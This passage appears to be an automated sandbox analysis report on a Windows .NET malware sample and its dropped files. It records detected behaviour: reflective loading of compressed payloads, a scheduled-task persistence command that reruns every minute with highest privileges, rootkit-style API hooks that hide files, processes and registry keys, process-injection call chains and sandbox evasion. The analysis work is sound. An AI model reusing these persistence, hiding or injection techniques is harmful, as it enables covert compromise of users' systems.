                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, didyoumissme.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Iloveyou.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, didyoumissme.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                .NET source code contains potential unpacker
                Source: r8k29DBraE.exe, -Module-.cs.Net Code: wzcdetect System.Reflection.Assembly.Load(byte[])
                Source: r8k29DBraE.exe, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: r8k29DBraE.exe, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
                Source: 1.2.r8k29DBraE.exe.2616e810000.11.raw.unpack, 2-eaq-rvqt-9ov-hv8-iamz6-p-.cs.Net Code: _00200hv_00208r_EAF0q6_0020z7f_0020gj4_0D72k_0028u_0020p_EAF0_0020_0028p System.Reflection.Assembly.Load(byte[])
                Source: 1.2.r8k29DBraE.exe.2611006dab0.2.raw.unpack, 2-eaq-rvqt-9ov-hv8-iamz6-p-.cs.Net Code: _00200hv_00208r_EAF0q6_0020z7f_0020gj4_0D72k_0028u_0020p_EAF0_0020_0028p System.Reflection.Assembly.Load(byte[])
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, didyoumissme.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, didyoumissme.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, didyoumissme.cs.Net Code: Memory
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, Iloveyou.cs.Net Code: XMemory System.AppDomain.Load(byte[])
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, didyoumissme.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, didyoumissme.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, didyoumissme.cs.Net Code: Memory
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, Iloveyou.cs.Net Code: XMemory System.AppDomain.Load(byte[])
                Source: r8k29DBraE.exeStatic PE information: 0xDB5F1B53 [Sat Aug 17 17:20:19 2086 UTC]
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F31BADD push rcx; retf 003Fh1_2_000002616F31BADE
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_0000023EB6A0BADD push rcx; retf 003Fh4_2_0000023EB6A0BADE
                Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002168199BADD push rcx; retf 003Fh5_2_000002168199BADE
                Source: C:\Windows\System32\svchost.exeCode function: 5_2_00000216819CC6DD push rcx; retf 003Fh5_2_00000216819CC6DE
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1CBADD push rcx; retf 003Fh6_2_000001CA7D1CBADE
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1FC6DD push rcx; retf 003Fh6_2_000001CA7D1FC6DE
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD3BADD push rcx; retf 003Fh9_2_0000017D2DD3BADE
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD6C6DD push rcx; retf 003Fh9_2_0000017D2DD6C6DE
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B90BADD push rcx; retf 003Fh10_2_0000022F4B90BADE
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE273C6DD push rcx; retf 003Fh11_2_0000013DE273C6DE
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB8FED pushfq ; retf 14_2_00000262F1CB901A
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB901D pushfq ; retf 14_2_00000262F1CB902A
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CBA815 pushfq ; retf 14_2_00000262F1CBA822
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CBAFA5 pushfq ; retf 14_2_00000262F1CBAFF2
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB8FB9 pushfq ; retf 14_2_00000262F1CB8FBA
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB8FDD pushfq ; retf 14_2_00000262F1CB8F8A
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB8F9D pushfq ; retf 14_2_00000262F1CB8FAA
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB8F2D pushfq ; retf 14_2_00000262F1CB8F3A
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB8F3D pushfq ; retf 14_2_00000262F1CB8F4A
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB8F4D pushfq ; retf 14_2_00000262F1CB8F5A
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB8F5D pushfq ; retf 14_2_00000262F1CB8F6A
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB8EED pushfq ; retf 14_2_00000262F1CB8EFA
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CBA6F1 pushfq ; retf 14_2_00000262F1CBA6F2
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB8EFD pushfq ; retf 14_2_00000262F1CB8F0A
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB8F0D pushfq ; retf 14_2_00000262F1CB8F2A
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CBA6E1 pushfq ; retf 14_2_00000262F1CBA6E2
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CBC6DD push rcx; retf 003Fh14_2_00000262F1CBC6DE
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CBAED5 pushfq ; retf 14_2_00000262F1CBAEE2
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CBAE75 pushfq ; retf 14_2_00000262F1CBAE92
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CBAE95 pushfq ; retf 14_2_00000262F1CBAEB2
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CBAE55 pushfq ; retf 14_2_00000262F1CBAE72
                Source: r8k29DBraE.exeStatic PE information: section name: .text entropy: 7.739802708970689
                Source: wzcsapi.exe.1.drStatic PE information: section name: .text entropy: 7.614490853127165

                Persistence and Installation Behavior

                barindex
                Creates files in the system32 config directory
                Source: C:\Windows\System32\lsass.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
                Source: C:\Windows\System32\lsass.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
                Source: C:\Users\user\Desktop\r8k29DBraE.exeFile created: C:\Users\user\Desktop\wzcsapi.exeJump to dropped file
                Source: C:\Users\user\Desktop\r8k29DBraE.exeFile created: C:\Users\user\Desktop\wzcsvc.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcsapi" /tr "%Current%\wzcsapi.exe"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Hooks files or directories query functions (used to hide files and directories)
                Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                Hooks processes query functions (used to hide processes)
                Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                Hooks registry keys query functions (used to hide registry keys)
                Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                Modifies the prolog of user mode functions (user mode inline hooks)
                Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Contains functionality to compare user and computer (likely to detect sandboxes)
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,4_2_00007FF6B5AD10C0
                Source: C:\Users\user\Desktop\r8k29DBraE.exeMemory allocated: 2616CD70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeMemory allocated: 2616EB60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeMemory allocated: C10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeMemory allocated: 1A8C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeWindow / User API: threadDelayed 7635Jump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeWindow / User API: threadDelayed 2142Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeWindow / User API: threadDelayed 1767Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeWindow / User API: threadDelayed 475Jump to behavior
                Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 8359Jump to behavior
                Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 1640Jump to behavior
                Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 8352
                Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 1584
                Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9875
                Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_9-16308
                Source: C:\Users\user\Desktop\r8k29DBraE.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_1-18658
                Source: C:\Windows\System32\WerFault.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_8-8133
                Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_5-15720
                Source: C:\Users\user\Desktop\wzcsvc.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-8418
                Source: C:\Users\user\Desktop\r8k29DBraE.exeAPI coverage: 9.9 %
                Source: C:\Windows\System32\svchost.exeAPI coverage: 5.0 %
